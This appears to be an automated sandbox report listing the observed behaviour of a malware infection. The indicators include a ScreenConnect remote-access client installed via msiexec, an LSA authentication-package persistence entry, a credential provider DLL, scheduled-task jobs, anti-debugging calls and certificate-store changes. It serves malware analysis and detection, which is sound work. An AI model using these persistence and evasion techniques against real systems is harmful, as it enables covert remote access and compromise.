File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A

AutoIT Executable


Boot or Logon Autostart Execution: Authentication Package

persistence privilege_escalation
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800330062006500300039006400390065003500650038003400300063003200300029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000 C:\Windows\system32\msiexec.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3be09d9e5e840c20)\hoalmz5c.tmp C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3be09d9e5e840c20)\hoalmz5c.newcfg C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsCredentialProvider.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.Override.en-US.resources C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.Override.resources C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.resources C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsFileManager.exe.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\app.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\system.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.Core.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.Windows.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsBackstageShell.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsFileManager.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.Client.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsAuthenticationPackage.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsBackstageShell.exe.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.en-US.resources C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\MSI44BF.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI4685.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f784339.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Tasks\Gxtuum.job N/A N/A
File created C:\Windows\Tasks\Test Task17.job N/A N/A
File opened for modification C:\Windows\INF\setupapi.ev3 C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\Installer\f784338.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI448F.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\{933D173F-6496-0F7D-53C4-FF46268B901A}\DefaultIcon C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f784338.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\{933D173F-6496-0F7D-53C4-FF46268B901A}\DefaultIcon C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
File opened for modification C:\Windows\INF\setupapi.ev1 C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\INF\setupapi.dev.log C:\Windows\system32\DrvInst.exe N/A
File created C:\Windows\Installer\f784339.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\wix{933D173F-6496-0F7D-53C4-FF46268B901A}.SchedServiceConfig.rmi C:\Windows\syswow64\MsiExec.exe N/A
File created C:\Windows\Installer\f78433b.msi C:\Windows\system32\msiexec.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10003000101\57028ffad4.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10003000101\57028ffad4.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 N/A N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A N/A N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\system32\mshta.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\DrvInst.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\DrvInst.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\DrvInst.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\DrvInst.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\DrvInst.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\sc-3be09d9e5e840c20\shell\open\command C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\InprocServer32 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\E4BCFB79704FF87AB30ED9E9E548C002\F371D3396946D7F0354CFF6462B809A1 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.4.4.9118\\3be09d9e5e840c20\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_Classes\Local Settings N/A N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\UseOriginalUrlEncoding = "1" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (3be09d9e5e840c20)\\ScreenConnect.WindowsClient.exe\" \"%1\"" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\ = "ScreenConnect Client (3be09d9e5e840c20) Credential Provider" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\F371D3396946D7F0354CFF6462B809A1\Full C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\PackageName = "ScreenConnect.ClientSetup.msi" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell\open C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell\open\command C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387} C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\sc-3be09d9e5e840c20 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\URL Protocol C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\PackageCode = "F371D3396946D7F0354CFF6462B809A1" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Version = "402915332" C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (3be09d9e5e840c20)\\ScreenConnect.WindowsCredentialProvider.dll" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\F371D3396946D7F0354CFF6462B809A1 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\ProductName = "ScreenConnect Client (3be09d9e5e840c20)" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Language = "1033" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\ProductIcon = "C:\\Windows\\Installer\\{933D173F-6496-0F7D-53C4-FF46268B901A}\\DefaultIcon" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.4.4.9118\\3be09d9e5e840c20\\" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\E4BCFB79704FF87AB30ED9E9E548C002 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Media\1 = ";" C:\Windows\system32\msiexec.exe N/A

Modifies system certificate store

defense_evasion spyware trojan
Description Indicator Process Target
